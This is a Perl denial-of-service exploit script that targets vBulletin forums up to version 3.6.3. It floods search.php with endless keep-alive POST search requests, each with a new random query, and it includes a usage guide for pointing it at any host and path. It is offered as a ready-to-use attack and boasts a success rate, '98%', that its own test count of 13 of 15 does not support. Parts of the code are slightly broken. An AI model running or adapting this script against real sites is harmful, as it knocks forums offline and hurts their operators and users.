# VBulletin DoS Exploit by www.h4x0r.ir 
# 
# The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works ;) 
# 
# important => Image Verification in (search.php) is NOT Enabled. 

# It works on 3.6.3 and prior [all] ! 
# 
#Perl Script 
use Socket; 
if (ARGV < 2) { &usage; } 
$rand=rand(10); 
$host = $ARGV[0]; 
$dir = $ARGV[1]; 
$host =~ s/(http:\/\/)//eg; 
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) 
{ 
$user="h4x0r".$rand.$i; 
$data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now"; 
$len = length $data; 
$foo = "POST ".$dir."search.php HTTP/1.1\r\n". 
               "Accept: */*\r\n". 
               "Accept-Language: en-gb\r\n". 
               "Content-Type: application/x-www-form-urlencoded\r\n". 
               "Accept-Encoding: gzip, deflate\r\n". 
               "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n". 
               "Host: $host\r\n". 
               "Content-Length: $len\r\n". 
               "Connection: Keep-Alive\r\n". 
               "Cache-Control: no-cache\r\n\r\n". 
 "$data"; 
     my $port = "80"; 
     my $proto = getprotobyname('tcp'); 
     socket(SOCKET, PF_INET, SOCK_STREAM, $proto); 
     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; 
     send(SOCKET,"$foo", 0); 
     syswrite STDOUT, "|" ; 

} 
print "\n\n"; 
system('ping $host'); 
sub usage { 
print "\tusage: \n"; 
print "\t$0 <host> </dir/>\n"; 
print "\tex: $0 127.0.0.1 /forum/\n"; 
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n"; 
print "\th4x0r Security Team\n"; 
print "\twww.h4x0r.ir\n\n"; 

exit(); };